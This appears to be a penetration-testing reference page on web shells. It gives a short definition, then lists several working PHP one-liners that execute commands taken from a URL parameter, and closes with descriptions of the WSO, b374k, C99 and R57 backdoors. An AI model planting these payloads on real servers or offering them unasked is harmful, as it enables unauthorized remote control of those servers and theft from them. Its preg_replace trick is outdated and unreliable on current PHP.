Web Shells

A web shell is a malicious piece of code or script created using server-side programming languages like PHP, ASP, PERL, RUBY, and Python. These scripts are then implanted onto a targeted server. This malicious code empowers attackers to establish remote access or remote administration control over the target server and its file system. Attackers introduce these malicious scripts by exploiting common vulnerabilities, including remote file inclusion (RFI), local file inclusion (LFI), exposure of administrative interfaces, and SQL injection.

You have access to different kinds of web shells on Kali here:

/usr/share/webshells

PHP Web Shells

Executing a single command:

<?php system("whoami"); ?>

Taking input from a URL parameter (e.g., shell.php?cmd=whoami):

<?php system($_GET['cmd']); ?>

The same as above, but using passthru:

<?php passthru($_GET['cmd']); ?>

To make shell_exec output the result, you need to echo it:

<?php echo shell_exec("whoami"); ?>

Note: exec() does not output the result unless you echo it and only provides the last line. Thus, it's not very useful for capturing output:

<?php echo exec("whoami"); ?>

Alternatively, you can use exec to return the output as an array and then print it:

<?php exec("ls -la", $array); print_r($array); ?>

A cool trick using preg_replace:

<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>

Using backticks to capture and display output:

<?php $output = `whoami`; echo "<pre>$output</pre>"; ?>

Or simply:

<?php echo `whoami`; ?>

Web Shell Tools

WSO (Web Shell by oRb)

WSO is a popular and versatile PHP web shell that allows unauthorized access to web servers. It provides a wide range of functionalities, including executing system commands, managing files, and manipulating databases. WSO is known for its user-friendly interface, making it a preferred choice for attackers seeking to compromise web servers.

b374k

b374k is another PHP web shell that provides attackers with a powerful control interface over a compromised server. It offers features like file management, remote execution of commands, and more. b374k is known for its compact and inconspicuous design, making it challenging to detect.

C99

C99 is a well-known PHP backdoor script that enables unauthorized access to web servers. It allows attackers to upload and execute files, view system information, and interact with the server. C99 is widely used by cyber criminals to compromise websites and servers.

R57

R57 is a PHP backdoor script that has been around for some time. It grants attackers control over a web server, enabling them to execute arbitrary commands and manipulate files. R57 has been used in various hacking incidents and is considered a security threat.